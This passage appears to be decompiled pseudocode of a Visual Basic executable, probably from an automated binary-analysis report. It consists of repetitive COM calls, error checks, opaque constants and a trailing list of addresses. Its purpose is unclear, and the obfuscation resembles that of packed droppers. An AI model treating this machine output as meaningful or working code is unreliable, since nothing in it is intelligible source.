                                      				_v340 = _t1261;
                                      				if(_v340 >= 0) {
                                      					_v520 = _v520 & 0x00000000;
                                      				} else {
                                      					_push(0x130);
                                      					_push(0x403ac4);
                                      					_push(_v336);
                                      					_push(_v340);
                                      					L0040145A();
                                      					_v520 = _t1261;
                                      				}
                                      				_push(0);
                                      				_push(0);
                                      				_push(_v148);
                                      				_push( &_v192);
                                      				L00401424();
                                      				_t1767 = _t1766 + 0x10;
                                      				if( *0x413010 != 0) {
                                      					_v524 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v524 = 0x413010;
                                      				}
                                      				_t1266 =  &_v152;
                                      				L00401430();
                                      				_v344 = _t1266;
                                      				_t1270 =  *((intOrPtr*)( *_v344 + 0x118))(_v344,  &_v288, _t1266,  *((intOrPtr*)( *((intOrPtr*)( *_v524)) + 0x30c))( *_v524));
                                      				asm("fclex");
                                      				_v348 = _t1270;
                                      				if(_v348 >= 0) {
                                      					_v528 = _v528 & 0x00000000;
                                      				} else {
                                      					_push(0x118);
                                      					_push(0x403ac4);
                                      					_push(_v344);
                                      					_push(_v348);
                                      					L0040145A();
                                      					_v528 = _t1270;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v532 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v532 = 0x413010;
                                      				}
                                      				_t1274 =  &_v156;
                                      				L00401430();
                                      				_v352 = _t1274;
                                      				_t1278 =  *((intOrPtr*)( *_v352 + 0x178))(_v352,  &_v260, _t1274,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x30c))( *_v532));
                                      				asm("fclex");
                                      				_v356 = _t1278;
                                      				if(_v356 >= 0) {
                                      					_v536 = _v536 & 0x00000000;
                                      				} else {
                                      					_push(0x178);
                                      					_push(0x403ac4);
                                      					_push(_v352);
                                      					_push(_v356);
                                      					L0040145A();
                                      					_v536 = _t1278;
                                      				}
                                      				_v200 = _v288;
                                      				_v208 = 3;
                                      				_v168 = _v284;
                                      				_v176 = 3;
                                      				_v216 = 0x2248ba;
                                      				_v224 = 3;
                                      				_v300 = 0x4edcc010;
                                      				_v296 = 0x5af4;
                                      				_t1283 =  &_v192;
                                      				L00401418();
                                      				L0040141E();
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				_t1289 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v300, _v276, _v280, 0x10,  &_v176, _t1283, _t1283,  &_v208, _v260,  &_v264);
                                      				_v360 = _t1289;
                                      				if(_v360 >= 0) {
                                      					_v540 = _v540 & 0x00000000;
                                      				} else {
                                      					_push(0x700);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v360);
                                      					L0040145A();
                                      					_v540 = _t1289;
                                      				}
                                      				_v92 = _v264;
                                      				L0040140C();
                                      				L00401406();
                                      				L00401400();
                                      				_t1769 = _t1767 + 0x30;
                                      				_v8 = 0xa;
                                      				_t1304 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v276, 3,  &_v176,  &_v192,  &_v208, 7,  &_v132,  &_v136,  &_v140,  &_v144,  &_v152,  &_v156,  &_v148);
                                      				_v312 = _t1304;
                                      				if(_v312 >= 0) {
                                      					_v544 = _v544 & 0x00000000;
                                      				} else {
                                      					_push(0x704);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v312);
                                      					L0040145A();
                                      					_v544 = _t1304;
                                      				}
                                      				_v64 = _v276;
                                      				_v8 = 0xb;
                                      				if( *0x413010 != 0) {
                                      					_v548 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v548 = 0x413010;
                                      				}
                                      				_t1309 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1309;
                                      				_t1313 =  *((intOrPtr*)( *_v312 + 0x188))(_v312,  &_v276, _t1309,  *((intOrPtr*)( *((intOrPtr*)( *_v548)) + 0x30c))( *_v548));
                                      				asm("fclex");
                                      				_v316 = _t1313;
                                      				if(_v316 >= 0) {
                                      					_v552 = _v552 & 0x00000000;
                                      				} else {
                                      					_push(0x188);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v552 = _t1313;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v556 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v556 = 0x413010;
                                      				}
                                      				_t1317 =  &_v136;
                                      				L00401430();
                                      				_v320 = _t1317;
                                      				_t1321 =  *((intOrPtr*)( *_v320 + 0x140))(_v320,  &_v260, _t1317,  *((intOrPtr*)( *((intOrPtr*)( *_v556)) + 0x30c))( *_v556));
                                      				asm("fclex");
                                      				_v324 = _t1321;
                                      				if(_v324 >= 0) {
                                      					_v560 = _v560 & 0x00000000;
                                      				} else {
                                      					_push(0x140);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v560 = _t1321;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v564 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v564 = 0x413010;
                                      				}
                                      				_t1325 =  &_v140;
                                      				L00401430();
                                      				_v328 = _t1325;
                                      				_t1329 =  *((intOrPtr*)( *_v328 + 0x50))(_v328,  &_v120, _t1325,  *((intOrPtr*)( *((intOrPtr*)( *_v564)) + 0x308))( *_v564));
                                      				asm("fclex");
                                      				_v332 = _t1329;
                                      				if(_v332 >= 0) {
                                      					_v568 = _v568 & 0x00000000;
                                      				} else {
                                      					_push(0x50);
                                      					_push(0x403ac4);
                                      					_push(_v328);
                                      					_push(_v332);
                                      					L0040145A();
                                      					_v568 = _t1329;
                                      				}
                                      				_v396 = _v120;
                                      				_v120 = _v120 & 0x00000000;
                                      				_v168 = _v396;
                                      				_v176 = 8;
                                      				_v264 = _v260;
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				_t1337 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, _v276,  &_v264, 0x10);
                                      				_v336 = _t1337;
                                      				if(_v336 >= 0) {
                                      					_v572 = _v572 & 0x00000000;
                                      				} else {
                                      					_push(0x708);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v336);
                                      					L0040145A();
                                      					_v572 = _t1337;
                                      				}
                                      				_push( &_v140);
                                      				_push( &_v136);
                                      				_push( &_v132);
                                      				_push(3);
                                      				L00401406();
                                      				_t1770 = _t1769 + 0x10;
                                      				L0040143C();
                                      				_v8 = 0xc;
                                      				if( *0x413010 != 0) {
                                      					_v576 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v576 = 0x413010;
                                      				}
                                      				_t1344 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1344;
                                      				_t1348 =  *((intOrPtr*)( *_v312 + 0x188))(_v312,  &_v276, _t1344,  *((intOrPtr*)( *((intOrPtr*)( *_v576)) + 0x30c))( *_v576));
                                      				asm("fclex");
                                      				_v316 = _t1348;
                                      				if(_v316 >= 0) {
                                      					_v580 = _v580 & 0x00000000;
                                      				} else {
                                      					_push(0x188);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v580 = _t1348;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v584 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v584 = 0x413010;
                                      				}
                                      				_t1352 =  &_v136;
                                      				L00401430();
                                      				_v320 = _t1352;
                                      				_t1356 =  *((intOrPtr*)( *_v320 + 0x48))(_v320,  &_v120, _t1352,  *((intOrPtr*)( *((intOrPtr*)( *_v584)) + 0x308))( *_v584));
                                      				asm("fclex");
                                      				_v324 = _t1356;
                                      				if(_v324 >= 0) {
                                      					_v588 = _v588 & 0x00000000;
                                      				} else {
                                      					_push(0x48);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v588 = _t1356;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v592 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v592 = 0x413010;
                                      				}
                                      				_t1360 =  &_v140;
                                      				L00401430();
                                      				_v328 = _t1360;
                                      				_t1364 =  *((intOrPtr*)( *_v328 + 0x68))(_v328,  &_v280, _t1360,  *((intOrPtr*)( *((intOrPtr*)( *_v592)) + 0x308))( *_v592));
                                      				asm("fclex");
                                      				_v332 = _t1364;
                                      				if(_v332 >= 0) {
                                      					_v596 = _v596 & 0x00000000;
                                      				} else {
                                      					_push(0x68);
                                      					_push(0x403ac4);
                                      					_push(_v328);
                                      					_push(_v332);
                                      					L0040145A();
                                      					_v596 = _t1364;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v600 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v600 = 0x413010;
                                      				}
                                      				_t1368 =  &_v144;
                                      				L00401430();
                                      				_v336 = _t1368;
                                      				_t1372 =  *((intOrPtr*)( *_v336 + 0x130))(_v336,  &_v148, _t1368,  *((intOrPtr*)( *((intOrPtr*)( *_v600)) + 0x30c))( *_v600));
                                      				asm("fclex");
                                      				_v340 = _t1372;
                                      				if(_v340 >= 0) {
                                      					_v604 = _v604 & 0x00000000;
                                      				} else {
                                      					_push(0x130);
                                      					_push(0x403ac4);
                                      					_push(_v336);
                                      					_push(_v340);
                                      					L0040145A();
                                      					_v604 = _t1372;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v608 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v608 = 0x413010;
                                      				}
                                      				_t1671 =  *((intOrPtr*)( *_v608));
                                      				_t1376 =  &_v152;
                                      				L00401430();
                                      				_v344 = _t1376;
                                      				_t1380 =  *((intOrPtr*)( *_v344 + 0x108))(_v344,  &_v124, _t1376,  *((intOrPtr*)(_t1671 + 0x304))( *_v608));
                                      				asm("fclex");
                                      				_v348 = _t1380;
                                      				if(_v348 >= 0) {
                                      					_v612 = _v612 & 0x00000000;
                                      				} else {
                                      					_push(0x108);
                                      					_push(0x403ac4);
                                      					_push(_v344);
                                      					_push(_v348);
                                      					L0040145A();
                                      					_v612 = _t1380;
                                      				}
                                      				_v400 = _v124;
                                      				_v124 = _v124 & 0x00000000;
                                      				_v184 = _v400;
                                      				_v192 = 8;
                                      				_v404 = _v148;
                                      				_v148 = _v148 & 0x00000000;
                                      				_v168 = _v404;
                                      				_v176 = 9;
                                      				_v288 = 0x24158f;
                                      				_v284 = _v276;
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				_v728 =  *0x4011d8;
                                      				_t1393 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v284, _v120, _t1671, _t1671, _v280,  &_v288, 0x10,  &_v192, 0xf0230230, 0x5afa,  &_v208);
                                      				_v352 = _t1393;
                                      				if(_v352 >= 0) {
                                      					_v616 = _v616 & 0x00000000;
                                      				} else {
                                      					_push(0x70c);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v352);
                                      					L0040145A();
                                      					_v616 = _t1393;
                                      				}
                                      				L004013F4();
                                      				L0040140C();
                                      				L00401406();
                                      				L00401400();
                                      				_t1772 = _t1770 + 0x24;
                                      				_v8 = 0xd;
                                      				L004013EE();
                                      				 *((intOrPtr*)( *_a4 + 0x72c))(_a4, 0x78e34920, 0x5b07, 0x7329fe,  &_v120,  &_v300, 2,  &_v176,  &_v192, 5,  &_v132,  &_v136,  &_v140,  &_v144,  &_v152);
                                      				_v60 = _v300;
                                      				L0040140C();
                                      				_v8 = 0xe;
                                      				if( *0x413010 != 0) {
                                      					_v620 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v620 = 0x413010;
                                      				}
                                      				_t1409 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1409;
                                      				_t1413 =  *((intOrPtr*)( *_v312 + 0xf8))(_v312,  &_v136, _t1409,  *((intOrPtr*)( *((intOrPtr*)( *_v620)) + 0x2fc))( *_v620));
                                      				asm("fclex");
                                      				_v316 = _t1413;
                                      				if(_v316 >= 0) {
                                      					_v624 = _v624 & 0x00000000;
                                      				} else {
                                      					_push(0xf8);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v624 = _t1413;
                                      				}
                                      				_push(0);
                                      				_push(0);
                                      				_push(_v136);
                                      				_push( &_v176);
                                      				L00401424();
                                      				_t1773 = _t1772 + 0x10;
                                      				if( *0x413010 != 0) {
                                      					_v628 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v628 = 0x413010;
                                      				}
                                      				_t1418 =  &_v140;
                                      				L00401430();
                                      				_v320 = _t1418;
                                      				_t1422 =  *((intOrPtr*)( *_v320 + 0x118))(_v320,  &_v276, _t1418,  *((intOrPtr*)( *((intOrPtr*)( *_v628)) + 0x2fc))( *_v628));
                                      				asm("fclex");
                                      				_v324 = _t1422;
                                      				if(_v324 >= 0) {
                                      					_v632 = _v632 & 0x00000000;
                                      				} else {
                                      					_push(0x118);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v632 = _t1422;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v636 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v636 = 0x413010;
                                      				}
                                      				_t1426 =  &_v144;
                                      				L00401430();
                                      				_v328 = _t1426;
                                      				_t1430 =  *((intOrPtr*)( *_v328 + 0x140))(_v328,  &_v260, _t1426,  *((intOrPtr*)( *((intOrPtr*)( *_v636)) + 0x30c))( *_v636));
                                      				asm("fclex");
                                      				_v332 = _t1430;
                                      				if(_v332 >= 0) {
                                      					_v640 = _v640 & 0x00000000;
                                      				} else {
                                      					_push(0x140);
                                      					_push(0x403ac4);
                                      					_push(_v328);
                                      					_push(_v332);
                                      					L0040145A();
                                      					_v640 = _t1430;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v644 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v644 = 0x413010;
                                      				}
                                      				_t1434 =  &_v148;
                                      				L00401430();
                                      				_v336 = _t1434;
                                      				_t1438 =  *((intOrPtr*)( *_v336 + 0x68))(_v336,  &_v280, _t1434,  *((intOrPtr*)( *((intOrPtr*)( *_v644)) + 0x304))( *_v644));
                                      				asm("fclex");
                                      				_v340 = _t1438;
                                      				if(_v340 >= 0) {
                                      					_v648 = _v648 & 0x00000000;
                                      				} else {
                                      					_push(0x68);
                                      					_push(0x403ac4);
                                      					_push(_v336);
                                      					_push(_v340);
                                      					L0040145A();
                                      					_v648 = _t1438;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v652 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v652 = 0x413010;
                                      				}
                                      				_t1442 =  &_v152;
                                      				L00401430();
                                      				_v344 = _t1442;
                                      				_t1446 =  *((intOrPtr*)( *_v344 + 0xf8))(_v344,  &_v156, _t1442,  *((intOrPtr*)( *((intOrPtr*)( *_v652)) + 0x2fc))( *_v652));
                                      				asm("fclex");
                                      				_v348 = _t1446;
                                      				if(_v348 >= 0) {
                                      					_v656 = _v656 & 0x00000000;
                                      				} else {
                                      					_push(0xf8);
                                      					_push(0x403ac4);
                                      					_push(_v344);
                                      					_push(_v348);
                                      					L0040145A();
                                      					_v656 = _t1446;
                                      				}
                                      				_push(0);
                                      				_push(0);
                                      				_push(_v156);
                                      				_push( &_v192);
                                      				L00401424();
                                      				_t1774 = _t1773 + 0x10;
                                      				if( *0x413010 != 0) {
                                      					_v660 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v660 = 0x413010;
                                      				}
                                      				_t1451 =  &_v160;
                                      				L00401430();
                                      				_v352 = _t1451;
                                      				_t1455 =  *((intOrPtr*)( *_v352 + 0xa0))(_v352,  &_v264, _t1451,  *((intOrPtr*)( *((intOrPtr*)( *_v660)) + 0x308))( *_v660));
                                      				asm("fclex");
                                      				_v356 = _t1455;
                                      				if(_v356 >= 0) {
                                      					_v664 = _v664 & 0x00000000;
                                      				} else {
                                      					_push(0xa0);
                                      					_push(0x403ac4);
                                      					_push(_v352);
                                      					_push(_v356);
                                      					L0040145A();
                                      					_v664 = _t1455;
                                      				}
                                      				L004013EE();
                                      				_v268 = _v260;
                                      				_v288 = _v276;
                                      				_t1458 =  &_v176;
                                      				L004013FA();
                                      				_v284 = _t1458;
                                      				_t1460 =  &_v192;
                                      				L004013FA();
                                      				 *((intOrPtr*)( *_a4 + 0x730))(_a4, 0x361c8d,  &_v284, 0x90f51c30, 0x5af5,  &_v288,  &_v268,  &_v120, L"adkomsthavers", _v280, _t1460, _t1460, _v264,  &_v208, _t1458);
                                      				L004013F4();
                                      				L0040140C();
                                      				_push( &_v156);
                                      				_push( &_v136);
                                      				_push( &_v160);
                                      				_push( &_v152);
                                      				_push( &_v148);
                                      				_push( &_v144);
                                      				_push( &_v140);
                                      				_push( &_v132);
                                      				_push(8);
                                      				L00401406();
                                      				_push( &_v192);
                                      				_push( &_v176);
                                      				_push(2);
                                      				L00401400();
                                      				_t1776 = _t1774 + 0x30;
                                      				_v8 = 0xf;
                                      				if( *0x413010 != 0) {
                                      					_v668 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v668 = 0x413010;
                                      				}
                                      				_t1481 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1481;
                                      				_t1485 =  *((intOrPtr*)( *_v312 + 0xa0))(_v312,  &_v260, _t1481,  *((intOrPtr*)( *((intOrPtr*)( *_v668)) + 0x2fc))( *_v668));
                                      				asm("fclex");
                                      				_v316 = _t1485;
                                      				if(_v316 >= 0) {
                                      					_v672 = _v672 & 0x00000000;
                                      				} else {
                                      					_push(0xa0);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v672 = _t1485;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v676 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v676 = 0x413010;
                                      				}
                                      				_t1489 =  &_v136;
                                      				L00401430();
                                      				_v320 = _t1489;
                                      				_t1493 =  *((intOrPtr*)( *_v320 + 0xf8))(_v320,  &_v140, _t1489,  *((intOrPtr*)( *((intOrPtr*)( *_v676)) + 0x30c))( *_v676));
                                      				asm("fclex");
                                      				_v324 = _t1493;
                                      				if(_v324 >= 0) {
                                      					_v680 = _v680 & 0x00000000;
                                      				} else {
                                      					_push(0xf8);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v680 = _t1493;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v684 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v684 = 0x413010;
                                      				}
                                      				_t1497 =  &_v144;
                                      				L00401430();
                                      				_v328 = _t1497;
                                      				_t1501 =  *((intOrPtr*)( *_v328 + 0x78))(_v328,  &_v276, _t1497,  *((intOrPtr*)( *((intOrPtr*)( *_v684)) + 0x308))( *_v684));
                                      				asm("fclex");
                                      				_v332 = _t1501;
                                      				if(_v332 >= 0) {
                                      					_v688 = _v688 & 0x00000000;
                                      				} else {
                                      					_push(0x78);
                                      					_push(0x403ac4);
                                      					_push(_v328);
                                      					_push(_v332);
                                      					L0040145A();
                                      					_v688 = _t1501;
                                      				}
                                      				_v300 =  *0x4011d0;
                                      				_v248 = 0x358644;
                                      				_v256 = 3;
                                      				_v280 = _v276;
                                      				_v408 = _v140;
                                      				_v140 = _v140 & 0x00000000;
                                      				_v168 = _v408;
                                      				_v176 = 9;
                                      				_v264 = _v260;
                                      				_v232 = 0x68c4b;
                                      				_v240 = 3;
                                      				_v216 = 0x3e5b6f;
                                      				_v224 = 3;
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				_t1515 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, 0x10, 0x10,  &_v264,  &_v176, 0x7c207e50, 0x5afd,  &_v280, 0x10,  &_v300,  &_v308);
                                      				_v336 = _t1515;
                                      				if(_v336 >= 0) {
                                      					_v692 = _v692 & 0x00000000;
                                      				} else {
                                      					_push(0x710);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v336);
                                      					L0040145A();
                                      					_v692 = _t1515;
                                      				}
                                      				_v52 = _v308;
                                      				_v48 = _v304;
                                      				_push( &_v144);
                                      				_push( &_v136);
                                      				_push( &_v132);
                                      				_push(3);
                                      				L00401406();
                                      				_t1777 = _t1776 + 0x10;
                                      				L0040143C();
                                      				_v8 = 0x10;
                                      				if( *0x413010 != 0) {
                                      					_v696 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v696 = 0x413010;
                                      				}
                                      				_t1524 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1524;
                                      				_t1528 =  *((intOrPtr*)( *_v312 + 0x178))(_v312,  &_v260, _t1524,  *((intOrPtr*)( *((intOrPtr*)( *_v696)) + 0x308))( *_v696));
                                      				asm("fclex");
                                      				_v316 = _t1528;
                                      				if(_v316 >= 0) {
                                      					_v700 = _v700 & 0x00000000;
                                      				} else {
                                      					_push(0x178);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v700 = _t1528;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v704 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v704 = 0x413010;
                                      				}
                                      				_t1712 =  *((intOrPtr*)( *_v704));
                                      				_t1532 =  &_v136;
                                      				L00401430();
                                      				_v320 = _t1532;
                                      				_t1536 =  *((intOrPtr*)( *_v320 + 0x118))(_v320,  &_v276, _t1532,  *((intOrPtr*)(_t1712 + 0x30c))( *_v704));
                                      				asm("fclex");
                                      				_v324 = _t1536;
                                      				if(_v324 >= 0) {
                                      					_v708 = _v708 & 0x00000000;
                                      				} else {
                                      					_push(0x118);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v708 = _t1536;
                                      				}
                                      				_v268 = 0x5633;
                                      				_v264 = 0x44d0;
                                      				_v168 = 0x48a00a;
                                      				_v176 = 3;
                                      				 *_t1777 =  *0x4011c8;
                                      				_t1543 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v176, _t1712, _t1712,  &_v264, _v260,  &_v268, _v276,  &_v272);
                                      				_v328 = _t1543;
                                      				if(_v328 >= 0) {
                                      					_v712 = _v712 & 0x00000000;
                                      				} else {
                                      					_push(0x714);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v328);
                                      					L0040145A();
                                      					_v712 = _t1543;
                                      				}
                                      				_v44 = _v272;
                                      				_push( &_v136);
                                      				_push( &_v132);
                                      				_push(2);
                                      				L00401406();
                                      				_t1778 = _t1777 + 0xc;
                                      				L0040143C();
                                      				_v8 = 0x11;
                                      				if( *0x413010 != 0) {
                                      					_v716 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v716 = 0x413010;
                                      				}
                                      				_t1550 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1550;
                                      				_t1554 =  *((intOrPtr*)( *_v312 + 0x78))(_v312,  &_v276, _t1550,  *((intOrPtr*)( *((intOrPtr*)( *_v716)) + 0x300))( *_v716));
                                      				asm("fclex");
                                      				_v316 = _t1554;
                                      				if(_v316 >= 0) {
                                      					_v720 = _v720 & 0x00000000;
                                      				} else {
                                      					_push(0x78);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v720 = _t1554;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v724 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v724 = 0x413010;
                                      				}
                                      				_t1558 =  &_v136;
                                      				L00401430();
                                      				_v320 = _t1558;
                                      				_t1562 =  *((intOrPtr*)( *_v320 + 0x60))(_v320,  &_v280, _t1558,  *((intOrPtr*)( *((intOrPtr*)( *_v724)) + 0x30c))( *_v724));
                                      				asm("fclex");
                                      				_v324 = _t1562;
                                      				if(_v324 >= 0) {
                                      					_v728 = _v728 & 0x00000000;
                                      				} else {
                                      					_push(0x60);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v728 = _t1562;
                                      				}
                                      				_v292 = _v280;
                                      				_v288 = 0x855264;
                                      				_v284 = _v276;
                                      				_t1720 =  &_v120;
                                      				L004013EE();
                                      				 *_t1778 =  *0x4011c0;
                                      				_t1570 =  *((intOrPtr*)( *_a4 + 0x718))(_a4, _t1720, _t1720,  &_v120,  &_v284,  &_v288, 0x9ec81,  &_v292);
                                      				_v328 = _t1570;
                                      				if(_v328 >= 0) {
                                      					_v732 = _v732 & 0x00000000;
                                      				} else {
                                      					_push(0x718);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v328);
                                      					L0040145A();
                                      					_v732 = _t1570;
                                      				}
                                      				L0040140C();
                                      				L00401406();
                                      				_v8 = 0x12;
                                      				L004013E8();
                                      				_v8 = 0x13;
                                      				_t1575 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 0xffffffff, 2,  &_v132,  &_v136);
                                      				asm("fclex");
                                      				_v312 = _t1575;
                                      				if(_v312 >= 0) {
                                      					_v736 = _v736 & 0x00000000;
                                      				} else {
                                      					_push(0x2b4);
                                      					_push(0x4038e8);
                                      					_push(_a4);
                                      					_push(_v312);
                                      					L0040145A();
                                      					_v736 = _t1575;
                                      				}
                                      				while(1) {
                                      					_v8 = 0x15;
                                      					_v40 = _v40 + 1;
                                      					_v8 = 0x16;
                                      					if(_v40 > 1) {
                                      						break;
                                      					}
                                      				}
                                      				_v8 = 0x1a;
                                      				E00411BBE();
                                      				_v8 = 0x1b;
                                      				_v40 = 2;
                                      				_v8 = 0x1c;
                                      				_v96 = 0x808344;
                                      				_v8 = 0x1d;
                                      				asm("cdq");
                                      				_t1583 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, _v96 / _v40);
                                      				_v20 = 0;
                                      				asm("wait");
                                      				_push(0x410e74);
                                      				L0040143C();
                                      				L0040143C();
                                      				return _t1583;
                                      			}
                                      0x0040f2f0
                                      0x0040f2f0
                                      0x0040f2f2
                                      0x0040f2f7
                                      0x0040f2fd
                                      0x0040f303
                                      0x0040f308
                                      0x0040f308
                                      0x0040f31e
                                      0x0040f33b
                                      0x0040f320
                                      0x0040f320
                                      0x0040f325
                                      0x0040f32a
                                      0x0040f32f
                                      0x0040f32f
                                      0x0040f35f
                                      0x0040f366
                                      0x0040f36b
                                      0x0040f386
                                      0x0040f389
                                      0x0040f38b
                                      0x0040f398
                                      0x0040f3ba
                                      0x0040f39a
                                      0x0040f39a
                                      0x0040f39c
                                      0x0040f3a1
                                      0x0040f3a7
                                      0x0040f3ad
                                      0x0040f3b2
                                      0x0040f3b2
                                      0x0040f3c8
                                      0x0040f3e5
                                      0x0040f3ca
                                      0x0040f3ca
                                      0x0040f3cf
                                      0x0040f3d4
                                      0x0040f3d9
                                      0x0040f3d9
                                      0x0040f409
                                      0x0040f410
                                      0x0040f415
                                      0x0040f430
                                      0x0040f436
                                      0x0040f438
                                      0x0040f445
                                      0x0040f46a
                                      0x0040f447
                                      0x0040f447
                                      0x0040f44c
                                      0x0040f451
                                      0x0040f457
                                      0x0040f45d
                                      0x0040f462
                                      0x0040f462
                                      0x0040f478
                                      0x0040f495
                                      0x0040f47a
                                      0x0040f47a
                                      0x0040f47f
                                      0x0040f484
                                      0x0040f489
                                      0x0040f489
                                      0x0040f4b9
                                      0x0040f4c0
                                      0x0040f4c5
                                      0x0040f4e0
                                      0x0040f4e6
                                      0x0040f4e8
                                      0x0040f4f5
                                      0x0040f51a
                                      0x0040f4f7
                                      0x0040f4f7
                                      0x0040f4fc
                                      0x0040f501
                                      0x0040f507
                                      0x0040f50d
                                      0x0040f512
                                      0x0040f512
                                      0x0040f521
                                      0x0040f523
                                      0x0040f525
                                      0x0040f531
                                      0x0040f532
                                      0x0040f537
                                      0x0040f541
                                      0x0040f55e
